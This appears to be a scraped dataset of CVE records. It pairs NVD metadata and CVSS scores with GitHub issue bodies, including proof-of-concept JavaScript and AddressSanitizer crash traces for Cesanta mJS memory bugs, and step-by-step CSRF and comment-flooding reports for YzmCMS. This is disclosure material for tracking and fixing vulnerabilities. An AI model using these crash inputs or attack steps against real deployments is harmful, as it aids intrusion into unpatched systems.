_start (/usr/local/bin/Gmjs+0xe449) 0x6040000000f8 is located 40 bytes inside of 48-byte region [0x6040000000d0,0x604000000100) freed by thread T0 here: #0 0x7f0093ceff30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30) #1 0x5590f9facdf8 in mbuf_insert src/common/mbuf.c:90 previously allocated by thread T0 here: #0 0x7f0093ceff30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30) #1 0x5590f9facdf8 in mbuf_insert src/common/mbuf.c:90 SUMMARY: AddressSanitizer: heap-use-after-free src/mjs_exec.c:1156 in mjs_apply Shadow bytes around the buggy address: 0x0c087fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff8000: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 00 =>0x0c087fff8010: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd[fd] 0x0c087fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ``` Credits: Found by OWL337 team.
Heap-use-after-free src/mjs_exec.c:1156 in mjs_apply
https://api.github.com/repos/cesanta/mjs/issues/199/comments
0
2021-12-31T05:41:58Z
2022-01-12T02:19:47Z
https://github.com/cesanta/mjs/issues/199
1,091,428,077
199
3,149
CVE-2021-46526
2022-01-27T21:15:10.207
Cesanta MJS v2.20.0 was discovered to contain a global buffer overflow via snquote at src/mjs_json.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/191" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/191" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/cesanta/mjs/issues/191
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript (JSON.stringify([1, 2, 3]))((JSON.parse - 10900)(JSON.stringify([1, 2, 3]))); ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js ================================================================= ====ERROR: AddressSanitizer: global-buffer-overflow on address 0x5570a88f30e4 at pc 0x5570a8803a88 bp 0x7ffc63d95f40 sp 0x7ffc63d95f30 READ of size 1 at 0x5570a88f30e4 thread T0 #0 0x5570a8803a87 in snquote src/mjs_json.c:81 #1 0x5570a8803a87 in to_json_or_debug src/mjs_json.c:167 #2 0x5570a8803a87 in mjs_json_stringify src/mjs_json.c:267 #3 0x5570a8803a87 in mjs_op_json_stringify src/mjs_json.c:494 0x5570a88f30e4 is located 0 bytes to the right of global variable '*.LC1' defined in 'src/mjs_array.c' (0x5570a88f30e0) of size 4 '*.LC1' is ascii string '%lu' 0x5570a88f30e4 is located 60 bytes to the left of global variable '*.LC9' defined in 'src/mjs_array.c' (0x5570a88f3120) of size 5 '*.LC9' is ascii string 'this' SUMMARY: AddressSanitizer: global-buffer-overflow src/mjs_json.c:81 in snquote Shadow bytes around the buggy address: 0x0aae951165c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0aae951165d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0aae951165e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0aae951165f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0aae95116600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0aae95116610: 00 00 00 00 00 00 00 00 00 00 00 00[04]f9 f9 f9 0x0aae95116620: f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9 01 f9 f9 f9 0x0aae95116630: f9 f9 f9 f9 06 f9 f9 f9 f9 f9 f9 f9 00 04 f9 f9 0x0aae95116640: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00 0x0aae95116650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0aae95116660: 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 00 00 00 04 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ====ABORTING ```
Global-buffer-overflow src/mjs_json.c:81 in snquote
https://api.github.com/repos/cesanta/mjs/issues/191/comments
0
2021-12-31T05:31:36Z
2021-12-31T05:31:36Z
https://github.com/cesanta/mjs/issues/191
1,091,425,933
191
3,150
CVE-2021-46527
2022-01-27T21:15:10.250
Cesanta MJS v2.20.0 was discovered to contain a heap buffer overflow via mjs_get_cstring at src/mjs_string.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/197" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/197" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/cesanta/mjs/issues/197
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript function JSEtest(a) { (typeof((typeof"cookie-present" !== gc("$$abcdabcd")) !== function() { return 100; })) !== function() { return 100; }; if ("cookie-present" !== gc("$$abcdabcd")) gc(true); if (a < 10) load(gc(JSON.stringify({ foo: [], bar: {} }, ['foo', 'bar', 'myProp'])));; if (a < 1) JSEtest(a+1);; } JSEtest(0) ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js =====ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60f000000203 at pc 0x5581d25fa021 bp 0x7ffff5880770 sp 0x7ffff5880760 READ of size 1 at 0x60f000000203 thread T0 #0 0x5581d25fa020 in mjs_get_cstring src/mjs_string.c:213 #1 0x5581d253f5aa in mjs_load src/mjs_builtin.c:58 #2 0x5581d2559244 in mjs_execute src/mjs_exec.c:853 #3 0x5581d2562a05 in mjs_exec_internal src/mjs_exec.c:1073 #4 0x5581d2562a05 in mjs_exec_file src/mjs_exec.c:1096 #5 0x5581d251f909 in main src/mjs_main.c:47 #6 0x7f20b4fd4b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #7 0x5581d2520449 in _start (/usr/local/bin/Gmjs+0xe449) Address 0x60f000000203 is a wild pointer. SUMMARY: AddressSanitizer: heap-buffer-overflow src/mjs_string.c:213 in mjs_get_cstring Shadow bytes around the buggy address: 0x0c1e7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1e7fff8000: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c1e7fff8010: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa 0x0c1e7fff8020: fa fa fa fa fa fa 00 00 00 00 00 00 00 00 00 00 0x0c1e7fff8030: 00 00 00 00 00 00 00 00 00 00 06 fa fa fa fa fa =>0x0c1e7fff8040:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ``` Credits: Found by OWL337 team.
Heap-buffer-overflow src/mjs_string.c:213 in mjs_get_cstring
https://api.github.com/repos/cesanta/mjs/issues/197/comments
0
2021-12-31T05:39:31Z
2022-01-12T02:19:19Z
https://github.com/cesanta/mjs/issues/197
1,091,427,555
197
3,151
CVE-2022-22868
2022-01-28T19:15:08.023
Gibbon CMS v22.0.01 was discovered to contain a cross-site scripting (XSS) vulnerability, that allows attackers to inject arbitrary script via name parameters.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/GibbonEdu/core/issues/1594" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/truonghuuphuc/CVE" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/truonghuuphuc/CVE/blob/main/CVE-2022-22868.pdf" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/GibbonEdu/core/issues/1594" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/truonghuuphuc/CVE" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/truonghuuphuc/CVE/blob/main/CVE-2022-22868.pdf" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gibbonedu:gibbon:22.0.01:*:*:*:*:*:*:*", "matchCriteriaId": "05336491-04BE-4BAC-BBE1-D96C7C734B3C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/GibbonEdu/core/issues/1594
[ "Third Party Advisory" ]
github.com
[ "GibbonEdu", "core" ]
[ Content removed by admin to follow proper security disclosure measures ]
Notification for Gibbon version v22.0.01
https://api.github.com/repos/GibbonEdu/core/issues/1594/comments
1
2022-01-03T03:47:42Z
2022-01-11T06:22:11Z
https://github.com/GibbonEdu/core/issues/1594
1,092,200,332
1,594
3,152
CVE-2016-3735
2022-01-28T20:15:08.437
Piwigo is image gallery software written in PHP. When a criteria is not met on a host, piwigo defaults to usingmt_rand in order to generate password reset tokens. mt_rand output can be predicted after recovering the seed used to generate it. This low an unauthenticated attacker to take over an account providing they know an administrators email address in order to be able to request password reset.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": null, "url": "http://piwigo.org/release-2.8.1%2C" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/commit/f51ee90c66527fd7ff634f3e8d414cb670da068d" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://github.com/Piwigo/Piwigo/issues/470%2C" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://piwigo.org/release-2.8.1%2C" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/commit/f51ee90c66527fd7ff634f3e8d414cb670da068d" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/Piwigo/Piwigo/issues/470%2C" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:*", "matchCriteriaId": "294E7F72-0D7D-4B0C-B05E-B58EFB07CF35", "versionEndExcluding": "2.8.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "335" ]
335
https://github.com/Piwigo/Piwigo/issues/470%2C
null
github.com
[ "Piwigo", "Piwigo" ]
Current functions used to generate random strings are not "that much random" (depending on the PHP version and operating system).
increase randomness on generate_key
https://api.github.com/repos/Piwigo/Piwigo/issues/470/comments
0
2016-04-26T09:03:40Z
2018-01-15T12:20:36Z
https://github.com/Piwigo/Piwigo/issues/470
151,080,998
470
3,153
CVE-2022-23887
2022-01-28T21:15:10.197
YzmCMS v6.3 was discovered to contain a Cross-Site Request Forgery (CSRF) which allows attackers to arbitrarily delete user accounts via /admin/admin_manage/delete.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/yzmcms/yzmcms/issues/59" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/yzmcms/yzmcms/issues/59" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yzmcms:yzmcms:6.3:*:*:*:*:*:*:*", "matchCriteriaId": "33CDD39A-96DC-4CF3-9CFF-694DF09B47BB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/yzmcms/yzmcms/issues/59
[ "Exploit", "Third Party Advisory" ]
github.com
[ "yzmcms", "yzmcms" ]
This vulnerability allows arbitrary users to be deleted, There is a user with ID 3, ![image](https://user-images.githubusercontent.com/89461075/150460342-a09eccf1-8611-42e2-a52d-336b307df441.png) Click delete and capture the package to generate the POC of CSRF, ![image](https://user-images.githubusercontent.com/89461075/150460532-43e70395-68f9-4c5d-aa8c-f9c208b44627.png) Package the deletion request to dorp, and put the generated POC in the HTML page and send it to the administrator. When the administrator clicks the page, the user with ID 3 can be deleted. ![image](https://user-images.githubusercontent.com/89461075/150460730-d7dca3d2-d913-4ce7-9d69-be0096f2092f.png) ![image](https://user-images.githubusercontent.com/89461075/150460754-0f9e1660-4bb4-428d-bea6-ce66e30fc9df.png)
YzmCMS V6. 3. CSRF vulnerability exists in the official version(YzmCMS V6.3 正式版存在csrf漏洞)
https://api.github.com/repos/yzmcms/yzmcms/issues/59/comments
1
2022-01-21T03:30:48Z
2022-02-14T02:59:09Z
https://github.com/yzmcms/yzmcms/issues/59
1,110,013,040
59
3,154
CVE-2022-23888
2022-01-28T21:15:10.233
YzmCMS v6.3 was discovered to contain a Cross-Site Request Forgey (CSRF) via the component /yzmcms/comment/index/init.html.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/yzmcms/yzmcms/issues/60" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/yzmcms/yzmcms/issues/60" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yzmcms:yzmcms:6.3:*:*:*:*:*:*:*", "matchCriteriaId": "33CDD39A-96DC-4CF3-9CFF-694DF09B47BB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/yzmcms/yzmcms/issues/60
[ "Exploit", "Third Party Advisory" ]
github.com
[ "yzmcms", "yzmcms" ]
Prepare two accounts: test01 and test02, background settings allow users to contribute, Generate POC of CSRF with test01, First log in to test01 and comment on an article, and grab the request packet, ![image](https://user-images.githubusercontent.com/89461075/150620972-2b6b5173-9595-4c8a-a420-4bf73e6f77d2.png) ![image](https://user-images.githubusercontent.com/89461075/150620988-362e6ea5-c06f-4e82-ad39-5b3e926cb553.png) Log in to TEST02 with another browser and open the web page of the generated POC, Triggered CSRF and successfully commented as TEST02. ![image](https://user-images.githubusercontent.com/89461075/150621077-c0974563-9d10-4801-b255-631261e8242f.png)
YzmCMSV6. 3. There is a CSRF vulnerability in the foreground in the official version(YzmCMS V6.3 正式版前台存在csrf漏洞)
https://api.github.com/repos/yzmcms/yzmcms/issues/60/comments
1
2022-01-22T02:18:45Z
2022-02-14T03:00:13Z
https://github.com/yzmcms/yzmcms/issues/60
1,111,188,217
60
3,155
CVE-2022-23889
2022-01-28T21:15:10.273
The comment function in YzmCMS v6.3 was discovered as being able to be operated concurrently, allowing attackers to create an unusually large number of comments.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/yzmcms/yzmcms/issues/61" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/yzmcms/yzmcms/issues/61" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yzmcms:yzmcms:6.3:*:*:*:*:*:*:*", "matchCriteriaId": "33CDD39A-96DC-4CF3-9CFF-694DF09B47BB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "674" ]
674
https://github.com/yzmcms/yzmcms/issues/61
[ "Exploit", "Third Party Advisory" ]
github.com
[ "yzmcms", "yzmcms" ]
Prepare an account test01, comment at the bottom of an article, and grab the request package, ![image](https://user-images.githubusercontent.com/89461075/150621837-edf5796c-4954-4b74-8b9b-e58d9f6bd4e9.png) Send to repeater, ![image](https://user-images.githubusercontent.com/89461075/150621849-0020dd7d-776a-4271-a699-b47addc3d7dc.png) Manually send several times, you can batch brush malicious comments. ![image](https://user-images.githubusercontent.com/89461075/150621880-c3b40211-aed4-448c-95d8-134b48a36645.png)
YzmCMS V6. 3. There are concurrent operations in the front desk of the official version.(YzmCMS V6.3 正式版前台存在可并发操作。)
https://api.github.com/repos/yzmcms/yzmcms/issues/61/comments
3
2022-01-22T02:43:52Z
2025-02-28T13:16:04Z
https://github.com/yzmcms/yzmcms/issues/61
1,111,196,610
61
3,156
CVE-2022-24123
2022-01-29T23:15:07.497
MarkText through 0.16.3 does not sanitize the input of a mermaid block before rendering. This could lead to Remote Code Execution via a .md file containing a mutation Cross-Site Scripting (XSS) payload.
